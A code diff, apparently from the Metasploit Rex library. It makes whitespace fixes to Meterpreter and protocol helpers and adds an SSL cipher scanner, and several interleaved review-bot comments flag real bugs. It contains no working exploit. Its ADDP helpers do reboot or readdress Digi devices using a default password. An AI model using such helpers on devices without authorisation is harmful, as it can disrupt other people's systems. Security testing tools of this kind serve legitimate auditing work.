diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/net.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/net.rb index 52be25d704..96bf3913b3 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/net.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/net.rb @@ -267,7 +267,7 @@ class Console::CommandDispatcher::Stdapi::Net print_error "Invalid Subnet mask" return false end - + print_line("Creating route #{args[0]}/#{args[1]} -> #{args[2]}") client.net.config.add_route(*args) @@ -282,7 +282,7 @@ class Console::CommandDispatcher::Stdapi::Net print_error "Invalid Subnet mask" return false end - + print_line("Deleting route #{args[0]}/#{args[1]} -> #{args[2]}") client.net.config.remove_route(*args) @@ -397,7 +397,7 @@ class Console::CommandDispatcher::Stdapi::Net else print_error("Failed to stop TCP relay on #{lhost || '0.0.0.0'}:#{lport}") next - end + end counter += 1 end diff --git a/lib/rex/proto/addp.rb b/lib/rex/proto/addp.rb index c1373b9a8a..e5116c6b6d 100644 --- a/lib/rex/proto/addp.rb +++ b/lib/rex/proto/addp.rb @@ -20,10 +20,10 @@ module Proto ERRORS = %W{ no_response unknown success authenticaton_failed unit_has_address invalid_value invalid_data unsupported_command } WLAN_ENC_MODES = %W{ unknown none wep40 wep128 } WLAN_AUTH_MODES = %W{ unknown open shared_key open_shared_key } - HWTYPES = %W{ - unknown ps3_desk8 ps3_desk16 ps3_desk32 ps3_rack16 ps2_desk16 ps2_rack16 + HWTYPES = %W{ + unknown ps3_desk8 ps3_desk16 ps3_desk32 ps3_rack16 ps2_desk16 ps2_rack16 lets_desk1 lets_desk2 lets_desk4 dorpia_dinrail1 nubox01 nubox02 nubox04 - digione_sp digione_ia digione_em + digione_sp digione_ia digione_em } CMD_CONF_REQ = 1 @@ -35,7 +35,7 @@ module Proto CMD_SET_DHCP_REQ = 7 CMD_SET_DHCP_REP = 8 CMD_SET_WL_REQ = 9 - CMD_SET_WL_REP = 10 + CMD_SET_WL_REP = 10 CMD_SET_WL_COUNTRIES_REQ = 11 CMD_SET_WL_COUNTRIES_REP = 12 CMD_EDP = 13 
@@ -61,11 +61,11 @@ module Proto def self.request_static_ip(magic, dmac, ip, mask, gw, pwd="dbps") mac = (dmac.length == 6) ? dmac : Rex::Socket.eth_aton(dmac) - buf = + buf = Rex::Socket.addr_aton(ip) + Rex::Socket.addr_aton(mask) + Rex::Socket.addr_aton(gw) + - mac + + mac + self.encode_password(pwd) req = magic + [CMD_SET_ADDR_REQ, buf.length].pack("nn") + buf @@ -74,9 +74,9 @@ module Proto def self.request_dhcp(magic, dmac, enabled, pwd="dbps") mac = (dmac.length == 6) ? dmac : Rex::Socket.eth_aton(dmac) - buf = + buf = [ enabled ? 1 : 0 ].pack("C") + - mac + + mac + self.encode_password(pwd) req = magic + [CMD_SET_DHCP_REQ, buf.length].pack("nn") + buf @@ -86,11 +86,11 @@ module Proto def self.request_reboot(magic, dmac, pwd="dbps") mac = (dmac.length == 6) ? dmac : Rex::Socket.eth_aton(dmac) buf = - mac + + mac + self.encode_password(pwd) req = magic + [CMD_REBOOT_REQ, buf.length].pack("nn") + buf - return req + return req end def self.decode_reply(data) @@ -185,7 +185,7 @@ module Proto # Store unknown responses res["unknown_0x#{"%.2x" % i_type}".to_sym] = i_data end - + bidx = bidx + 2 + i_len end return res @@ -194,8 +194,8 @@ module Proto def self.reply_to_string(res) str = "" - fields = [ - :hwname, :hwtype, :hwrev, :fwrev, + fields = [ + :hwname, :hwtype, :hwrev, :fwrev, :mac, :ip, :mask, :gw, :hostname, :domain, :dns, :dhcp, :msg, :result, :error, :advisory, :ports, :realport, :realport_enc, diff --git a/lib/rex/proto/dcerpc/exceptions.rb b/lib/rex/proto/dcerpc/exceptions.rb index f9b204edd3..80e7ccd5d2 100644 --- a/lib/rex/proto/dcerpc/exceptions.rb +++ b/lib/rex/proto/dcerpc/exceptions.rb @@ -5,7 +5,7 @@ module DCERPC module Exceptions class Error < ::RuntimeError - + @@errors = { 0x00000000 => "stub-defined", 0x00000001 => "nca_s_fault_other", @@ -103,7 +103,7 @@ class Error < ::RuntimeError 0x1c010014 => "nca_server_too_busy", 0x1c010017 => "nca_unsupported_type" } - + def initialize(*args) super(*args) end 
@@ -136,7 +136,7 @@ class InvalidPacket < Error def initialize(message = nil) @message = message end - + def to_s str = 'Invalid packet.' if (@message) diff --git a/lib/rex/proto/dcerpc/ndr.rb b/lib/rex/proto/dcerpc/ndr.rb index d07bd0e0f5..a4ef79b507 100644 --- a/lib/rex/proto/dcerpc/ndr.rb +++ b/lib/rex/proto/dcerpc/ndr.rb @@ -20,7 +20,7 @@ class NDR warn 'should be using Rex::Encoder::NDR' return [string].pack('V') end - + # Encode a 2 byte short # use to encode: # short element_1; @@ -28,7 +28,7 @@ class NDR warn 'should be using Rex::Encoder::NDR' return [string].pack('v') end - + # Encode a single byte # use to encode: # byte element_1; @@ -53,7 +53,7 @@ class NDR string += "\x00" # null pad return long(string.length) + long(0) + long(string.length) + Rex::Text.to_unicode(string) + align(Rex::Text.to_unicode(string)) end - + # Encode a string that is already unicode encoded # use to encode: # w_char *element_1; diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index f360701556..495a3564d6 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -129,11 +129,11 @@ class Client # @return [ClientRequest] def request_raw(opts={}) opts = self.config.merge(opts) - + opts['ssl'] = self.ssl opts['cgi'] = false opts['port'] = self.port - + req = ClientRequest.new(opts) end @@ -151,7 +151,7 @@ class Client # @return [ClientRequest] def request_cgi(opts={}) opts = self.config.merge(opts) - + opts['ctype'] ||= 'application/x-www-form-urlencoded' opts['ssl'] = self.ssl opts['cgi'] = true diff --git a/lib/rex/proto/http/handler/proc.rb b/lib/rex/proto/http/handler/proc.rb index 03e66a26c2..c5422fb375 100644 --- a/lib/rex/proto/http/handler/proc.rb +++ b/lib/rex/proto/http/handler/proc.rb @@ -27,7 +27,7 @@ class Handler::Proc < Handler # Returns true if the procedure is representing a virtual directory. # def relative_resource_required? - virt_dir + virt_dir end # 
diff --git a/lib/rex/proto/http/server.rb b/lib/rex/proto/http/server.rb index b10dc1e8a5..8d16732c1e 100644 --- a/lib/rex/proto/http/server.rb +++ b/lib/rex/proto/http/server.rb @@ -288,7 +288,7 @@ protected when Packet::ParseCode::Completed dispatch_request(cli, cli.request) cli.reset_cli - + when Packet::ParseCode::Partial # Return and wait for the on_client_data handler to be called again # The Request object tracks the state of the request for us diff --git a/lib/rex/proto/iax2/codecs/alaw.rb b/lib/rex/proto/iax2/codecs/alaw.rb index f011356719..c980446912 100644 --- a/lib/rex/proto/iax2/codecs/alaw.rb +++ b/lib/rex/proto/iax2/codecs/alaw.rb @@ -8,7 +8,7 @@ class ALaw < G711 def self.decode(buff) buff.unpack("C*").map{ |x| LOOKUP_ALAW2LIN16[x] }.pack('v*') end - + end end end diff --git a/lib/rex/proto/iax2/codecs/mulaw.rb b/lib/rex/proto/iax2/codecs/mulaw.rb index 25131c7149..d4203568a1 100644 --- a/lib/rex/proto/iax2/codecs/mulaw.rb +++ b/lib/rex/proto/iax2/codecs/mulaw.rb @@ -9,7 +9,7 @@ class MuLaw < G711 def self.decode(buff) buff.unpack("C*").map{ |x| LOOKUP_ULAW2LIN16[x] }.pack('v*') end - + end end end diff --git a/lib/rex/proto/ntlm/constants.rb b/lib/rex/proto/ntlm/constants.rb index 8a78ddae8a..db10360ab7 100644 --- a/lib/rex/proto/ntlm/constants.rb +++ b/lib/rex/proto/ntlm/constants.rb @@ -9,7 +9,7 @@ class Constants LM_MAGIC = "KGS!@\#$%" TIME_OFFSET = 11644473600 MAX64 = 0xffffffffffffffff - + FLAGS = { :UNICODE => 0x00000001, :OEM => 0x00000002, @@ -32,7 +32,7 @@ class Constants :KEY128 => 0x20000000, :KEY56 => 0x80000000 } - + FLAG_KEYS = FLAGS.keys.sort{|a, b| FLAGS[a] <=> FLAGS[b] } DEFAULT_FLAGS = { diff --git a/lib/rex/proto/rfb/cipher.rb b/lib/rex/proto/rfb/cipher.rb index 216e953945..7a0c37dbdb 100644 --- a/lib/rex/proto/rfb/cipher.rb +++ b/lib/rex/proto/rfb/cipher.rb @@ -31,7 +31,7 @@ module RFB ## class Cipher - + def self.mangle_password(password) key = '' key = password.dup if password 
diff --git a/lib/rex/proto/smb/client.rb b/lib/rex/proto/smb/client.rb index 72c35379fb..807713956e 100644 --- a/lib/rex/proto/smb/client.rb +++ b/lib/rex/proto/smb/client.rb @@ -1884,7 +1884,7 @@ NTLM_UTILS = Rex::Proto::NTLM::Utils name = resp_data[didx + 70 + 24, info[15]].sub!(/\x00+$/, '') files[name] = { - 'type' => (info[14] & 0x10) ? 'D' : 'F', + 'type' => ((info[14] & 0x10)==0x10) ? 'D' : 'F', 'attr' => info[14], 'info' => info } diff --git a/lib/rex/proto/smb/constants.rb b/lib/rex/proto/smb/constants.rb index e03085830a..fb19e389cd 100644 --- a/lib/rex/proto/smb/constants.rb +++ b/lib/rex/proto/smb/constants.rb @@ -265,7 +265,7 @@ FILE_VOLUME_IS_COMPRESSED = 0x00008000 # SMB Error Codes SMB_STATUS_SUCCESS = 0x00000000 SMB_ERROR_BUFFER_OVERFLOW = 0x80000005 -SMB_STATUS_MORE_PROCESSING_REQUIRED = 0xC0000016 +SMB_STATUS_MORE_PROCESSING_REQUIRED = 0xC0000016 SMB_STATUS_ACCESS_DENIED = 0xC0000022 SMB_STATUS_LOGON_FAILURE = 0xC000006D diff --git a/lib/rex/proto/smb/utils.rb b/lib/rex/proto/smb/utils.rb index f9cb3681c0..63f43ab655 100644 --- a/lib/rex/proto/smb/utils.rb +++ b/lib/rex/proto/smb/utils.rb @@ -20,11 +20,11 @@ CONST = Rex::Proto::SMB::Constants } return access end - + # Creates a mode mask for use with the CLIENT.open() call based on a string def self.open_mode_to_mode(str) mode = 0 - + str.each_byte { |c| case [c].pack('C').downcase when 'x' # Fail if the file already exists @@ -32,7 +32,7 @@ CONST = Rex::Proto::SMB::Constants when 't' # Truncate the file if it already exists mode |= CONST::OPEN_MODE_TRUNC when 'c' # Create the file if it does not exist - mode |= CONST::OPEN_MODE_CREAT + mode |= CONST::OPEN_MODE_CREAT when 'o' # Just open the file, clashes with x mode |= CONST::OPEN_MODE_OPEN end @@ -40,7 +40,7 @@ CONST = Rex::Proto::SMB::Constants return mode end - + # Returns a disposition value for smb.create based on permission string def self.create_mode_to_disposition(str) str.each_byte { |c| 
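Review bot: The context line just above the corrected `'type'` entry builds `name` with `sub!(/\x00+$/, '')`, and `sub!` returns nil when it substitutes nothing, so a directory entry whose name has no trailing NUL would be stored under `files[nil]`. Whether the server always pads the name cannot be told from this hunk, but the value comes from the remote side and should not be trusted to. The non-mutating form avoids the problem: `name = resp_data[didx + 70 + 24, info[15]].sub(/\x00+\z/, '')`. The enclosing method starts and ends outside the hunk.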
@@ -83,7 +83,7 @@ CONST = Rex::Proto::SMB::Constants end return encoded end - + # Convert a name from its NetBIOS equivalent def self.nbname_decode(str) decoded = '' diff --git a/lib/rex/proto/tftp/client.rb b/lib/rex/proto/tftp/client.rb index 90dcf85717..daec9cacf5 100644 --- a/lib/rex/proto/tftp/client.rb +++ b/lib/rex/proto/tftp/client.rb @@ -64,7 +64,7 @@ class Client # # Methods for both upload and download # - + def start_server_socket self.server_sock = Rex::Socket::Udp.create( 'LocalHost' => local_host, @@ -138,7 +138,7 @@ class Client # # Methods for download # - + def rrq_packet req = [OpRead, self.remote_file, self.mode] packstr = "na#{self.remote_file.length+1}a#{self.mode.length+1}" @@ -231,7 +231,7 @@ class Client # # Methods for upload # - + def wrq_packet req = [OpWrite, self.remote_file, self.mode] packstr = "na#{self.remote_file.length+1}a#{self.mode.length+1}" diff --git a/lib/rex/proto/tftp/server.rb b/lib/rex/proto/tftp/server.rb index 89af4703cb..c01d18f9a9 100644 --- a/lib/rex/proto/tftp/server.rb +++ b/lib/rex/proto/tftp/server.rb @@ -173,7 +173,7 @@ class Server attr_accessor :listen_host, :listen_port, :context attr_accessor :sock, :files, :transfers, :uploaded attr_accessor :thread - + attr_accessor :incoming_file_hook protected @@ -189,9 +189,9 @@ protected def save_output(tr) self.uploaded << tr[:file] - + return incoming_file_hook.call(tr) if incoming_file_hook - + if @output_dir fn = tr[:file][:name].split(File::SEPARATOR)[-1] if fn diff --git a/lib/rex/registry/lfkey.rb b/lib/rex/registry/lfkey.rb index 29916ad179..78009c6cee 100644 --- a/lib/rex/registry/lfkey.rb +++ b/lib/rex/registry/lfkey.rb @@ -24,7 +24,7 @@ class LFBlock hash_offset = offset + 0x04 1.upto(@number_of_keys) do |h| - + hash = LFHashRecord.new(hive_blob, hash_offset) @hash_records << hash 
@@ -39,7 +39,7 @@ end class LFHashRecord attr_accessor :nodekey_offset, :nodekey_name_verification - + def initialize(hive_blob, offset) @nodekey_offset = hive_blob[offset, 4].unpack('l').first @nodekey_name_verification = hive_blob[offset+0x04, 4].to_s diff --git a/lib/rex/ropbuilder/rop.rb b/lib/rex/ropbuilder/rop.rb index aee2c11d26..15f34535a4 100644 --- a/lib/rex/ropbuilder/rop.rb +++ b/lib/rex/ropbuilder/rop.rb @@ -217,7 +217,7 @@ class RopCollect < RopBase # get raw bytes buf = @disassembler.read_raw_data(addr, x + xtra) - + # make sure disassembling forward leads to our instruction next if not ends_with_addr(buf, addr, ea) diff --git a/lib/rex/socket.rb b/lib/rex/socket.rb index 8e37cf3719..7a93bbc9be 100644 --- a/lib/rex/socket.rb +++ b/lib/rex/socket.rb @@ -461,14 +461,14 @@ module Socket def self.eth_aton(mac) mac.split(":").map{|c| c.to_i(16) }.pack("C*") end - + # # Converts a 6-byte binary string into a colon-delimited MAC address # def self.eth_ntoa(bin) bin.unpack("C6").map{|x| "%.2x" % x }.join(":").upcase end - + # # Converts a CIDR subnet into an array (base, bcast) # diff --git a/lib/rex/socket/comm.rb b/lib/rex/socket/comm.rb index c2ed353517..9be12ad06f 100644 --- a/lib/rex/socket/comm.rb +++ b/lib/rex/socket/comm.rb @@ -16,7 +16,7 @@ module Socket module Comm ### - # + # # This mixin provides stubs for event notification handlers that can be # registered with a Comm factory to be called when various events occur, # such as socket instantiation. diff --git a/lib/rex/socket/parameters.rb b/lib/rex/socket/parameters.rb index 35c1288739..e83783e843 100644 --- a/lib/rex/socket/parameters.rb +++ b/lib/rex/socket/parameters.rb 
@@ -140,10 +140,15 @@ class Rex::Socket::Parameters self.ssl = false end - if (hash['SSLVersion'] and hash['SSLVersion'].to_s =~ /^(SSL2|SSL3|TLS1)$/i) + supported_ssl_versions = ['SSL2', 'SSL23', 'TLS1', 'SSL3', :SSLv2, :SSLv3, :SSLv23, :TLSv1] + if (hash['SSLVersion'] and supported_ssl_versions.include? hash['SSLVersion']) self.ssl_version = hash['SSLVersion'] end + if (hash['SSLCipher']) + self.ssl_cipher = hash['SSLCipher'] + end + if (hash['SSLCert'] and ::File.file?(hash['SSLCert'])) begin self.ssl_cert = ::File.read(hash['SSLCert']) @@ -338,6 +343,11 @@ class Rex::Socket::Parameters # attr_accessor :ssl_version # + # What specific SSL Cipher(s) to use, may be a string containing the cipher name + # or an array of strings containing cipher names e.g. ["DHE-RSA-AES256-SHA", "DHE-DSS-AES256-SHA"] + # + attr_accessor :ssl_cipher + # # The SSL certificate, in pem format, stored as a string. See +SslTcpServer#make_ssl+ # attr_accessor :ssl_cert diff --git a/lib/rex/socket/ssl_tcp.rb b/lib/rex/socket/ssl_tcp.rb index 2620808c41..0e9d662ea3 100644 --- a/lib/rex/socket/ssl_tcp.rb +++ b/lib/rex/socket/ssl_tcp.rb @@ -1,6 +1,5 @@ # -*- coding: binary -*- require 'rex/socket' - ### # # This class provides methods for interacting with an SSL TCP client @@ -60,11 +59,11 @@ begin version = :SSLv3 if(params) case params.ssl_version - when 'SSL2' + when 'SSL2', :SSLv2 version = :SSLv2 - when 'SSL23' + when 'SSL23', :SSLv23 version = :SSLv23 - when 'TLS1' + when 'TLS1', :TLSv1 version = :TLSv1 end end @@ -81,6 +80,9 @@ begin # VERIFY_PEER self.sslctx.verify_mode = OpenSSL::SSL::VERIFY_PEER self.sslctx.options = OpenSSL::SSL::OP_ALL + if params.ssl_cipher + self.sslctx.ciphers = params.ssl_cipher + end # Set the verification callback self.sslctx.verify_callback = Proc.new do |valid, store| diff --git a/lib/rex/socket/subnet_walker.rb b/lib/rex/socket/subnet_walker.rb index b781f08234..c90c3e7f33 100644 --- a/lib/rex/socket/subnet_walker.rb +++ b/lib/rex/socket/subnet_walker.rb 
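Review bot: The new `supported_ssl_versions.include? hash['SSLVersion']` test in the first parameters.rb hunk is exact and case-sensitive, whereas the removed regex matched `hash['SSLVersion'].to_s` case-insensitively. A value such as `'tls1'` that used to be accepted is now dropped without any message, and the connection then appears to fall back to `:SSLv3`, the default set in ssl_tcp.rb. For an option that selects the protocol version, a silent fallback is easy to miss. At minimum I would document it above the list, `# Exact, case-sensitive match; any other value is ignored and the default version is used`, or compare a normalised value. The enclosing method starts and ends outside the hunk.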
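Review bot: The added `if params.ssl_cipher` in the last ssl_tcp.rb hunk dereferences `params` unconditionally, while the version selection in the previous hunk of the same file is wrapped in `if(params)`. If `params` can be nil there it can be nil here, and the new line would raise NoMethodError before the handshake is set up. Guarding it the same way keeps the two consistent: `if params and params.ssl_cipher`. The method body continues outside the hunk, so this should be confirmed against how `params` is obtained.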
@@ -48,7 +48,7 @@ class SubnetWalker end self.curr_ip_idx += 1 - + self.curr_ip.join('.') end diff --git a/lib/rex/sslscan/result.rb b/lib/rex/sslscan/result.rb new file mode 100644 index 0000000000..5dcc1211f3 --- /dev/null +++ b/lib/rex/sslscan/result.rb 
@@ -0,0 +1,200 @@
+
+require 'rex/socket'
+require 'rex/ui/text/table'
+
+module Rex::SSLScan
+class Result
+
+ attr_accessor :openssl_sslv2
+
+ attr_reader :ciphers
+ attr_reader :supported_versions
+
+ def initialize()
+ @cert = nil
+ @ciphers = Set.new
+ @supported_versions = [:SSLv2, :SSLv3, :TLSv1]
+ end
+
+ def cert
+ @cert
+ end
+
+ def cert=(input)
+ unless input.kind_of? OpenSSL::X509::Certificate or input.nil?
+ raise ArgumentError, "Must be an X509 Cert!"
+ end
+ @cert = input
+ end
+
+ def sslv2
+ @ciphers.reject{|cipher| cipher[:version] != :SSLv2 }
+ end
+
+ def sslv3
+ @ciphers.reject{|cipher| cipher[:version] != :SSLv3 }
+ end
+
+ def tlsv1
+ @ciphers.reject{|cipher| cipher[:version] != :TLSv1 }
+ end
+
+ def weak_ciphers
+ accepted.reject{|cipher| cipher[:weak] == false }
+ end
+
+ def strong_ciphers
+ accepted.reject{|cipher| cipher[:weak] }
+ end
+
+ # Returns all accepted ciphers matching the supplied version
+ # @param version [Symbol, Array] The SSL Version to filter on
+ # @raise [ArgumentError] if the version supplied is invalid
+ # @return [Array] An array of accepted cipher details matching the supplied versions
+ def accepted(version = :all)
+ enum_ciphers(:accepted, version)
+ end
+
+ # Returns all rejected ciphers matching the supplied version
+ # @param version [Symbol, Array] The SSL Version to filter on
+ # @raise [ArgumentError] if the version supplied is invalid
+ # @return [Array] An array of rejected cipher details matching the supplied versions
+ def rejected(version = :all)
+ enum_ciphers(:rejected, version)
+ end
+
+ def each_accepted(version = :all)
+ accepted(version).each do |cipher_result|
+ yield cipher_result
+ end
+ end
+
+ def each_rejected(version = :all)
+ rejected(version).each do |cipher_result|
+ yield cipher_result
+ end
+ end
+
+ def supports_sslv2?
+ !(accepted(:SSLv2).empty?)
+ end
+
+ def supports_sslv3?
+ !(accepted(:SSLv3).empty?)
+ end
+
+ def supports_tlsv1?
+ !(accepted(:TLSv1).empty?)
+ end
+
+ def supports_ssl?
+ supports_sslv2? or supports_sslv3? or supports_tlsv1?
+ end
+
+ def supports_weak_ciphers?
+ !(weak_ciphers.empty?)
+ end
+
+ def standards_compliant?
+ if supports_ssl?
+ return false if supports_sslv2?
+ return false if supports_weak_ciphers?
+ end
+ true
+ end
+
+ # Adds the details of a cipher test to the Result object.
+ # @param version [Symbol] the SSL Version
+ # @param cipher [String] the SSL cipher
+ # @param key_length [Fixnum] the length of encryption key
+ # @param status [Symbol] :accepted or :rejected
+ def add_cipher(version, cipher, key_length, status)
+ unless @supported_versions.include? version
+ raise ArgumentError, "Must be a supported SSL Version"
+ end
+ unless OpenSSL::SSL::SSLContext.new(version).ciphers.flatten.include? cipher
+ raise ArgumentError, "Must be a valid SSL Cipher for #{version}!"
+ end
+ unless key_length.kind_of? Fixnum
+ raise ArgumentError, "Must supply a valid key length"
+ end
+ unless [:accepted, :rejected].include? status
+ raise ArgumentError, "Status must be either :accepted or :rejected"
+ end
+
+ strong_cipher_ctx = OpenSSL::SSL::SSLContext.new(version)
+ # OpenSSL Directive For Strong Ciphers
+ # See: http://www.rapid7.com/vulndb/lookup/ssl-weak-ciphers
+ strong_cipher_ctx.ciphers = "ALL:!aNULL:!eNULL:!LOW:!EXP:RC4+RSA:+HIGH:+MEDIUM"
+
+ if strong_cipher_ctx.ciphers.flatten.include? cipher
+ weak = false
+ else
+ weak = true
+ end
+
+ cipher_details = {:version => version, :cipher => cipher, :key_length => key_length, :weak => weak, :status => status}
+ @ciphers << cipher_details
+ end
+
+ def to_s
+ unless supports_ssl?
+ return "Server does not appear to support SSL on this port!"
+ end
+ table = Rex::Ui::Text::Table.new(
+ 'Header' => 'SSL Ciphers',
+ 'Indent' => 1,
+ 'Columns' => ['Status', 'Weak', 'SSL Version', 'Key Length', 'Cipher'],
+ 'SortIndex' => -1
+ )
+ ciphers.each do |cipher|
+ if cipher[:weak]
+ weak = '*'
+ else
+ weak = ' '
+ end
+ table << [cipher[:status].to_s.capitalize, weak , cipher[:version], cipher[:key_length], cipher[:cipher]]
+ end
+
+ # Sort by SSL Version, then Key Length, and then Status
+ table.rows.sort_by!{|row| [row[0],row[2],row[3]]}
+ text = "#{table.to_s}"
+ if @cert
+ text << " \n\n #{@cert.to_text}"
+ end
+ if openssl_sslv2 == false
+ text << "\n\n *** WARNING: Your OS hates freedom! Your OpenSSL libs are compiled without SSLv2 support!"
+ end
+ text
+ end
+
+ protected
+
+ # @param state [Symbol] Either :accepted or :rejected
+ # @param version [Symbol, Array] The SSL Version to filter on (:SSLv2, :SSLv3, :TLSv1, :all)
+ # @return [Set] The Set of cipher results matching the filter criteria
+ def enum_ciphers(state, version = :all)
+ case version
+ when Symbol
+ case version
+ when :all
+ return @ciphers.select{|cipher| cipher[:status] == state}
+ when :SSLv2, :SSLv3, :TLSv1
+ return @ciphers.select{|cipher| cipher[:status] == state and cipher[:version] == version}
+ else
+ raise ArgumentError, "Invalid SSL Version Supplied: #{version}"
+ end
+ when Array
+ version = version.reject{|v| !(@supported_versions.include? v)}
+ if version.empty?
+ return @ciphers.select{|cipher| cipher[:status] == state}
+ else
+ return @ciphers.select{|cipher| cipher[:status] == state and version.include? cipher[:version]}
+ end
+ else
+ raise ArgumentError, "Was expecting Symbol or Array and got #{version.class}"
+ end
+ end
+
+end
+end
diff --git a/lib/rex/sslscan/scanner.rb b/lib/rex/sslscan/scanner.rb
new file mode 100644
index 0000000000..f751bc8dd1
--- /dev/null
+++ b/lib/rex/sslscan/scanner.rb
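Review bot: The weak/strong verdict in `add_cipher` comes from a cipher-string literal inside the method, so `weak_ciphers`, `supports_weak_ciphers?` and `standards_compliant?` inherit a policy that none of them document. Under that string only anonymous, null, LOW and export suites count as weak, while RC4 and MEDIUM suites are reported as strong. I would lift it into a documented constant, `STRONG_CIPHER_SPEC = "ALL:!aNULL:!eNULL:!LOW:!EXP:RC4+RSA:+HIGH:+MEDIUM".freeze`, and give those three predicates YARD comments stating what "weak" means here. The method also builds two `OpenSSL::SSL::SSLContext` objects per call and scanner.rb calls it once per cipher, so the per-version lists are worth caching. Separately, the comment in `to_s` says the rows are sorted by SSL version, key length, then status, but `sort_by!` keys on `row[0], row[2], row[3]`, which is status, version, key length.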
@@ -0,0 +1,205 @@
+require 'rex/socket'
+require 'rex/sslscan/result'
+
+module Rex::SSLScan
+
+class Scanner
+
+ attr_accessor :context
+ attr_accessor :host
+ attr_accessor :port
+ attr_accessor :timeout
+
+ attr_reader :supported_versions
+ attr_reader :sslv2
+
+ # Initializes the scanner object
+ # @param host [String] IP address or hostname to scan
+ # @param port [Fixnum] Port number to scan, default: 443
+ # @param timeout [Fixnum] Timeout for connections, in seconds. default: 5
+ # @raise [StandardError] Raised when the configuration is invalid
+ def initialize(host,port = 443,context = {},timeout=5)
+ @host = host
+ @port = port
+ @timeout = timeout
+ @context = context
+ if check_opensslv2 == true
+ @supported_versions = [:SSLv2, :SSLv3, :TLSv1]
+ @sslv2 = true
+ else
+ @supported_versions = [:SSLv3, :TLSv1]
+ @sslv2 = false
+ end
+ raise StandardError, "The scanner configuration is invalid" unless valid?
+ end
+
+ # Checks whether the scanner option has a valid configuration
+ # @return [Boolean] True or False, the configuration is valid.
+ def valid?
+ begin
+ @host = Rex::Socket.getaddress(@host, true)
+ rescue
+ return false
+ end
+ return false unless @port.kind_of? Fixnum
+ return false unless @port >= 0 and @port <= 65535
+ return false unless @timeout.kind_of? Fixnum
+ return true
+ end
+
+ # Initiate the Scan against the target. Will test each cipher one at a time.
+ # @return [Result] object containing the details of the scan
+ def scan
+ scan_result = Rex::SSLScan::Result.new
+ scan_result.openssl_sslv2 = sslv2
+ # If we can't get any SSL connection, then don't bother testing
+ # individual ciphers.
+ if test_ssl == :rejected and test_tls == :rejected
+ return scan_result
+ end
+
+ @supported_versions.each do |ssl_version|
+ sslctx = OpenSSL::SSL::SSLContext.new(ssl_version)
+ sslctx.ciphers.each do |cipher_name, ssl_ver, key_length, alg_length|
+ status = test_cipher(ssl_version, cipher_name)
+ scan_result.add_cipher(ssl_version, cipher_name, key_length, status)
+ if status == :accepted and scan_result.cert.nil?
+ scan_result.cert = get_cert(ssl_version, cipher_name)
+ end
+ end
+ end
+ scan_result
+ end
+
+ def test_ssl
+ begin
+ scan_client = Rex::Socket::Tcp.create(
+ 'Context' => @context,
+ 'PeerHost' => @host,
+ 'PeerPort' => @port,
+ 'SSL' => true,
+ 'SSLVersion' => :SSLv23,
+ 'Timeout' => @timeout
+ )
+ rescue ::Exception => e
+ return :rejected
+ ensure
+ if scan_client
+ scan_client.close
+ end
+ end
+ return :accepted
+ end
+
+ def test_tls
+ begin
+ scan_client = Rex::Socket::Tcp.create(
+ 'Context' => @context,
+ 'PeerHost' => @host,
+ 'PeerPort' => @port,
+ 'SSL' => true,
+ 'SSLVersion' => :TLSv1,
+ 'Timeout' => @timeout
+ )
+ rescue ::Exception => e
+ return :rejected
+ ensure
+ if scan_client
+ scan_client.close
+ end
+ end
+ return :accepted
+ end
+
+ # Tests the specified SSL Version and Cipher against the configured target
+ # @param ssl_version [Symbol] The SSL version to use (:SSLv2, :SSLv3, :TLSv1)
+ # @param cipher [String] The SSL Cipher to use
+ # @return [Symbol] Either :accepted or :rejected
+ def test_cipher(ssl_version, cipher)
+ validate_params(ssl_version,cipher)
+ begin
+ scan_client = Rex::Socket::Tcp.create(
+ 'Context' => @context,
+ 'PeerHost' => @host,
+ 'PeerPort' => @port,
+ 'SSL' => true,
+ 'SSLVersion' => ssl_version,
+ 'SSLCipher' => cipher,
+ 'Timeout' => @timeout
+ )
+ rescue ::Exception => e
+ return :rejected
+ ensure
+ if scan_client
+ scan_client.close
+ end
+ end
+
+ return :accepted
+ end
+
+ # Retrieve the X509 Cert from the target service,
+ # @param ssl_version [Symbol] The SSL version to use (:SSLv2, :SSLv3, :TLSv1)
+ # @param cipher [String] The SSL Cipher to use
+ # @return [OpenSSL::X509::Certificate] if the certificate was retrieved
+ # @return [Nil] if the cert couldn't be retrieved
+ def get_cert(ssl_version, cipher)
+ validate_params(ssl_version,cipher)
+ begin
+ scan_client = Rex::Socket::Tcp.create(
+ 'PeerHost' => @host,
+ 'PeerPort' => @port,
+ 'SSL' => true,
+ 'SSLVersion' => ssl_version,
+ 'SSLCipher' => cipher,
+ 'Timeout' => @timeout
+ )
+ cert = scan_client.peer_cert
+ if cert.kind_of? OpenSSL::X509::Certificate
+ return cert
+ else
+ return nil
+ end
+ rescue ::Exception => e
+ return nil
+ ensure
+ if scan_client
+ scan_client.close
+ end
+ end
+ end
+
+
+ protected
+
+ # Validates that the SSL Version and Cipher are valid both seperately and
+ # together as part of an SSL Context.
+ # @param ssl_version [Symbol] The SSL version to use (:SSLv2, :SSLv3, :TLSv1)
+ # @param cipher [String] The SSL Cipher to use
+ # @raise [StandardError] If an invalid or unsupported SSL Version was supplied
+ # @raise [StandardError] If the cipher is not valid for that version of SSL
+ def validate_params(ssl_version, cipher)
+ raise StandardError, "The scanner configuration is invalid" unless valid?
+ unless @supported_versions.include? ssl_version
+ raise StandardError, "SSL Version must be one of: #{@supported_versions.to_s}"
+ end
+ if ssl_version == :SSLv2 and sslv2 == false
+ raise StandardError, "Your OS hates freedom! Your OpenSSL libs are compiled without SSLv2 support!"
+ else
+ unless OpenSSL::SSL::SSLContext.new(ssl_version).ciphers.flatten.include? cipher
+ raise StandardError, "Must be a valid SSL Cipher for #{ssl_version}!"
+ end
+ end
+ end
+
+ def check_opensslv2
+ begin
+ OpenSSL::SSL::SSLContext.new(:SSLv2)
+ rescue
+ return false
+ end
+ return true
+ end
+
+end
+end
diff --git a/lib/rex/struct2/c_struct.rb b/lib/rex/struct2/c_struct.rb
index 444b992aa0..fa767a4fa3 100644
--- a/lib/rex/struct2/c_struct.rb
+++ b/lib/rex/struct2/c_struct.rb
